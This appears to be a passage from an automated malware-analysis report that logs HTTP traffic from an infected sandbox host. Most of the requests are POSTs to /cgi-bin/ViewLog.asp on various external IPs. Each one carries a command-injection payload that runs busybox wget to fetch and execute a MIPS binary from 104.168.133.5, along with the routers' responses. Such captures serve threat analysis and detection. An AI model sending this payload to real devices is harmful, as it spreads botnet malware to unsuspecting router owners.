                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:26.310372114 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:51.654232025 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              379192.168.2.134859231.30.120.418080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:03.899869919 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.104372025 CET430INHTTP/1.1 404 Not Found
                                              Date: Thu, 23 Nov 2023 04:37:22 GMT
                                              Server: DNVRS-Webs
                                              Cache-Control: no-cache
                                              Content-Length: 166
                                              Content-Type: text/html
                                              Connection: keep-alive
                                              Keep-Alive: timeout=60, max=99
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              380192.168.2.133492494.30.248.808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:03.915270090 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:04.133812904 CET328INHTTP/1.0 200 OK
                                              Server: httpd/2.0
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              Date: Thu, 23 Nov 2023 04:17:03 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 73 63 72 69 70 74 3e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 2f 4d 61 69 6e 5f 4c 6f 67 69 6e 2e 61 73 70 27 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 48 45 41 44 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><script>top.location.href='/Main_Login.asp';</script></HEAD></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              381192.168.2.133493894.30.248.808080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:04.348066092 CET388INHTTP/1.0 400 Bad Request
                                              Server: httpd/2.0
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              Date: Thu, 23 Nov 2023 04:17:04 GMT
                                              Content-Type: text/html
                                              Connection: close
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              382192.168.2.134435095.164.149.2248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:06.252331972 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:06.354316950 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/3.5.20
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:17:06 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3454
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72
                                              Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-inter


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              383192.168.2.135175694.141.4.918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:06.355828047 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:06.982383013 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:07.225826025 CET1340INHTTP/1.1 401 Unauthorized
                                              Set-Cookie: Session=0; httponly
                                              Content-Type: text/html
                                              Content-Length: 1244
                                              Date: Thu, 23 Nov 2023 04:17:20 GMT
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 2f 3e 3c 74 69 74 6c 65 20 69 64 3d 27 74 69 74 6c 65 27 3e 2e 3a 3a 57 65 6c 63 6f 6d 65 20 74 6f 20 74 68 65 20 57 65 62 2d 42 61 73 65 64 20 43 6f 6e 66 69 67 75 72 61 74 6f 72 3a 3a 2e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 62 75 69 6c 64 2f 79 75 69 2f 79 75 69 2d 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 7a 79 78 65 6c 68 65 6c 70 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 69 6e 69 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 42 74 6e 22 3e 3c 2f 64 69 76 3e 3c 69 6e 70 75 74 20 69 64 3d 22 41 55 54 48 5f 52 45 54 22 20 76 61 6c 75 65 3d 22 49 6e 69 74 4c 6f 67 69 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 69 6e 70 75 74 20 69 64 3d 22 43 55 52 52 5f 4d 55 4c 54 49 4c 41 4e 47 22 20 76 61 6c 75 65 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 69 6e 70 75 74 20 69 64 3d 22 41 56 41 49 4c 5f 4d 55 4c 54 49 4c 41 4e 47 22 20 76 61 6c 75 65 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 69 6e 70 75 74 20 69 64 3d 22 4d 4f 44 45 4c 5f 4e 41 4d 45 22 20 76 61 6c 75 65 3d 22 56 4d 47 31 33 31 32 2d 42 31 30 44 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 69 6e 70 75 74 20 69 64 3d 22 44 45 53 43 52 49 50 54 49 4f 4e 22 20 76 61 6c 75 65 3d 22 57 69 72 65 6c 65 73 73 20 4e 20 56 44 53 4c 32 20 34 2d 70 6f 72 74 20 47 61 74 65 77 61 79 20 77 69 74 68 20 55 53 42 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 69 6e 70 75 74 20 69 64 3d 22 46 49 52 4d 57 41 52 45 5f 56 49 52 53 49 4f 4e 22 20 76 61 6c 75 65 3d 22 56 35 2e 31 33 28 41 41 58 41 2e 35 29 43 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 69 6e 70 75 74 20 69 64 3d 22 48 54 54 50 5f 54 49 4d 45 52 22 20 76 61 6c 75 65 3d 22 33 30 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 69 6e 70 75 74 20 69 64 3d 22 63 75 72 72 65 6e 74 6c 6f 67 55 73 65 72 22 20 76 61 6c 75 65 3d 22 73 75 70 65 72 76 69 73 6f 72 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 69 6e 70 75 74 20 69 64 3d 22 43 55
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="X-UA-Compatible" /><title id='title'>.::Welcome to the Web-Based Configurator::.</title><script type="text/javascript" src="/js/build/yui/yui-min.js"></script><script type="text/javascript" src="/js/zyxelhelp.js"></script><script type="text/javascript" src="/js/init.js"></script></head><body><div id="loginBtn"></div><input id="AUTH_RET" value="InitLogin" style="display:none"><input id="CURR_MULTILANG" value="en" style="display:none"><input id="AVAIL_MULTILANG" value="en" style="display:none"><input id="MODEL_NAME" value="VMG1312-B10D" style="display:none"><input id="DESCRIPTION" value="Wireless N VDSL2 4-port Gateway with USB" style="display:none"><input id="FIRMWARE_VIRSION" value="V5.13(AAXA.5)C0" style="display:none"><input id="HTTP_TIMER" value="300" style="display:none"><input id="currentlogUser" value="supervisor" style="display:none"><input id="CU


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              384192.168.2.135644662.29.88.48080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:06.368122101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              385192.168.2.133698031.136.65.1188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:06.544409037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:07.142343998 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:08.294394016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:10.694375992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
